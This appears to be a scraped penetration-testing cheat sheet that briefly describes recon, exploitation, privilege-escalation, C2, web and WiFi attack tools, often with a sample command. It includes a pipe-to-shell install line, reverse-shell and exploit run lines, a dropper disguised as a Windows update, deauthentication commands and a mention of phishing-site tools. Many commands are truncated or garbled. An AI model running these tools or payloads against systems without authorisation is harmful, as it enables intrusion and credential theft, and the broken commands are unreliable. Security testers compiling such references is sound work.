Information Gathering/ Enumeration

NMAP – Network Mapper NSEDoc Reference Portal

Nmap Cheat Sheet

Usage and Examples | Nmap Network Scanning

Firewall/IDS Evasion and Spoofing | Nmap Network Scanning
Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses.nmap -sC -sV -p- --min-rate 10000 <target-ip> -oN output
Batea goal of Batea is to allow security teams to automatically filter interesting network assets in large networks using nmap scan reports. # Complete info
$ sudo nmap -A -oX output.xml

# Partial info
$ sudo nmap -O -sV -oX output.xml

$ batea -v output.xml
Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.# Extract any file that it finds
binwalk -e firmware.bin
Create phishing webistes to phish information.
Censys reduces your Internet attack surface by continually discovering unknown assets and helping remediate Internet facing risks
Shodan Engine for the Internet of Everythingapache country:no port:80 http.status:200
Dig (Domain Information Groper) is a command line utility that performs DNS lookup by querying name servers and displaying the result to you.dig [server] [name] [type]
DNSdumpster is a FREE domain research tool that can discover hosts related to a domain. Search for domain.
Enum4Linux is a tool for enumerating information from Windows and Samba systemsenum4linux -a host
EyeWitness is designed to take screenshots of websites provide some server header info, and identify default credentials if known../EyeWitness -f urls.txt --web
Insomnia API queries with GUISee website
Masscan is an Internet-scale port scanner. It can scan the entire Internet in under 5 minutes, transmitting 10 million packets per second, from a single machine.Scans the entire intenret
masscan -p0-65535
Maltego is a very powerful data mining tool that offers an endless combination of search tools and strategies
SIPvicious suite OSS is a set of security tools that can be used to audit SIP based VoIP systems. Specifically, it allows you to find SIP servers, enumerate SIP extensions and finally, crack their password.See github for full documentation
Steghide is a steganography program that is able to hide data in various kinds of image- and audio-files.$ steghide embed -cf picture.jpg -ef secret.txt
Enter passphrase:
Re-Enter passphrase:
embedding "secret.txt" in "picture.jpg"... done
ODAT – Oracle Database Attacking Tool (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.See github.
theHarvester tool gathers names, emails, IPs, subdomains, and URLstheharvester -d -b googlex
Social searcher Social Media Search Enginen/a
Sn1per hidden assets and vulnerabilities in your environmentSee github
gitleaksGitHub – gitleaks/gitleaks: Protect and discover secrets using Gitleaks 🔑Gitleaks is a SAST tool for detecting and preventing hardcoded secrets like passwords, api keys, and tokens in git repos. gitleaks detect --source . -v


Repository for EternalBlue exploit.See repository.
Infectious Monkey Monkey is a free open-source, network penetration testing tool. It is a breach and attack simulator that uses real-world attack techniques and known vulnerabilities.
Metsploit vulnerabilites automatically. msfconsole
Windows-php-reverse-shell php reverse shell implemented using binary , based on an webshell .Usage : change the ip and port in the windows-php-reverse-shell.php file upload , set up an listener in you machine , access the windows-php-reverse-shell.php file on the server
SQLmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. To get a list of basic options and switches use:
python -h
IIS 6.0 BOF – RCE – Buffer Overflow in the ScStoragePathFromUrl  function in webdavpython2 targetip targetport srcip srcport
Drupalgeddon2 core – Highly critical – Remote Code Execution – SA-CORE-2018-002ruby drupalgeddon2.rb TARGET
Windows Kernel Exploit List of Kernel exploitsSee github

Password Crackers

Hashcat is a password cracking tool. See CheatSheet
Hydra tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system.See CheatSheet

Privilege Escalation

ToolLinkOS DescriptionCommand/Example
BeRoot Project BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.usage: beRoot.exe [-h] [-l]

Deepce Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)# Make the script executable and then run it
chmod +x ./

GTFObins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.See website.
LinEnum possible PrivEsc VectorsSee github
linPEAS possbile privesc vectors./
winPEAS possible privesc vectors winpeas.exe or winpeas.bat
linuxprivchecker possible privesc vectors
linux-exploit-suggester possible privesc vectors. Run locally./
windows-exploit-suggester List posbile privesc vectors. Run locally./ --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
PowerSploit\PowerUp.ps1 aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.See full potentional i github. To execute on target, see my cheatsheet.
PowerSploit\PowerView.ps1 is series of functions that performs network and Windows domain enumeration and exploitation.See full potentional i github. To execute on target, see my cheatsheet.
Juicy Potato and its variants leverages the privilege escalation chain based on BITS service having the MiTM listener on and when you have SeImpersonate or SeAssignPrimaryToken privileges.
MS10-059 Chimichurri in the Tracing Feature for Services Could Allow an Elevation of Privilege (982799)chimichurri.exe attackerip attackerport
Polkit CVE-2021-4034’s pkexec, a SUID-root program that is installed by default on every major Linux distribution:python3 (run it on target to get root.


C2 – Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.
C2 – PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.See github
C2 – Cobalt Strike Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer’s network.
C2 – Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent
C2 – Starkiller (Empire frontend) is a Frontend for Powershell Empire./starkiller-<version>.AppImage --no-sandbox
C2 – Meterpreter PS1 starts a listener Server on a Windows|Linux attacker machine and generates oneliner PS reverse shell payloads obfuscated in BXOR with a random secret key and another layer of Characters/Variables Obfuscation to be executed on the victim machineDeliver Dropper/Payload To Target Machine (apache2)
USE THE 'Attack Vector URL' TO DELIVER '' (dropper) TO TARGET .. UNZIP (IN DESKTOP) AND EXECUTE 'Update-KB4524147.bat' (Run As Administrator)..
C2 – Alan Framework Framework is a post-exploitation framework useful during red-team activities.
C2 – Silver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing.Linux One Liner
curl|sudo bash 
and then run 

Armitage Armitage is a Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit.
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.$ chisel server --port $PORT --proxy
# listens on $PORT, proxy web requests to
sshuttle allows you to create a VPN connection from your machine to any remote server that you can connect to via sshsshuttle [options] -r [username@]sshserver[:port] <subnets …>
lingolo-ng is a simplelightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).See github
C2 – HavocHavoc (

GitHub – HavocFramework/Havoc: The Havoc Framework.
Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.

New C2 framework that can bypass Win 11 defender
See github
C2 – Brute ratel Brute Ratel C4 | Badger doesn’t care. It takes what it wants!A Customized Command and Control Center for Red Team and Adversary Simulation

Web Application

BurpSuite Suite is a framework of web appliccation pentesting tool. It is used to perform web app testing.
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects.dirb <url_base> <url_base> [<wordlist_file(s)>] [options]
Dirbpy is a new version of dirb but in python. This version is faster than the normal version in C because it uses thread. Dirbpy is a Web Content Scanner. It looks for hidden Web Objects.dirbpy -o -u https://[....].com
Dirhunter is a web crawler optimize for search and analyze directories.$ dirhunt
ffuf fast web fuzzer written in Go.ffuf -w /path/to/wordlist -u https://target/FUZZ
Feroxbuster is a tool designed to perform Forced Browsing../feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
Gobuster is a tool used to brute-force:
URIs (directories and files) in web sites.
DNS subdomains (with wildcard support).
Virtual Host names on target web servers.
Open Amazon S3 buckets
gobuster dir -u http:// -w wordlist
Fuxploider tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.python3 --url --not-regex "wrong file type"
FuzzDB the likelihood of finding application security vulnerabilities through dynamic application security testing.
Nikto is web server scannernikto -h <target>
Raccoon Security Tool for Reconnaissance and Information GatheringUsage: raccoon [OPTIONS] TARGET
Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT.To enumerate subdomains of specific domain:
python -d
Joomscan the task of vulnerability detection and reliability assurance in Joomla CMS [options]
Droopscan CMS are:
droopescan scan drupal -u -t 32
Crawleet Recon & Exploitaition Tool.python -u <URL>
wafw00f Bypass wafw00f http://target

Active Directory Environment

BloodHoundAD uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment.
Impacket is a collection of Python classes for working with network protocols. NOT LIMITED TO AD ENVIRONMENT.
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. NOT LIMITED TO AD ENVIRONMENTSee github
PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. NOT LIMITED TO AD ENVIRONMENTSee github

Malware Analysis(MA)/ Buffer Overflow(BOF)

MAGhidra software reverse engineering (SRE) suite of tools developed by NSA’s Research Directorate in support of the Cybersecurity mission
BOFPython GDB PEDA – Python Exploit Development Assistance for GDBSee Github

WiFi / Wireless

Aircrack-ng is a complete suite of tools to assess WiFi network security.

Monitoring: Packet capture and export of data to text files for further processing by third party tools
Attacking: Replay attacks, deauthentication, fake access points and others via packet injection
Testing: Checking WiFi cards and driver capabilities (capture and injection)
Cracking: WEP and WPA PSK (WPA 1 and 2)
#Deatuh attack
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

# Start airodump-ng to collect authentication handshake
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
BoopSuite is a set of tools written in Python designed for wireless auditing and security testing.BoopMon [-h] [-v] [-c [CHANNEL [CHANNEL ...]]] [-k] [-n NAME] -i {}
               [-m MAC]
Kismet is a wireless network and device detector, sniffer, wardriving tool, and WIDS (wireless intrusion detection) framework.